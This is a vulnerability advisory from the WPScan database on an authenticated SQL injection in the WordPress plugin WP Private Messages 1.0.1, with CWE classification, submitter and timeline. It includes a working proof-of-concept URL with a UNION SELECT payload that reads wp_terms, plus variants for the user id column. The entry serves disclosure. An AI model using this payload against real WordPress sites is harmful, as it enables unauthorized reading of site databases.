WP Private Messages 1.0.1 – Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: registered user.

$_GET[‘id’] is not escaped. URL is accessible for every registered user.
Proof of Concept
http://www.example.com/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=read&id=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved

Obs: Use id number of your user in third column after word select. For example:

…UNION+SELECT+1,2,1,name,slug…

…UNION+SELECT+1,2,2,name,slug…

…UNION+SELECT+1,2,3,name,slug…

…UNION+SELECT+1,2,4,name,slug…

…UNION+SELECT+1,2,5,name,slug…

Affects

Plugin wp-private-messages

References

URL http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 91
Verified Yes
WPVDB ID 8701

Timeline

Publicly Published 2016-12-12 (about 1 month ago)
Added 2016-12-20 (29 days ago)
Last Updated 2016-12-20 (29 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.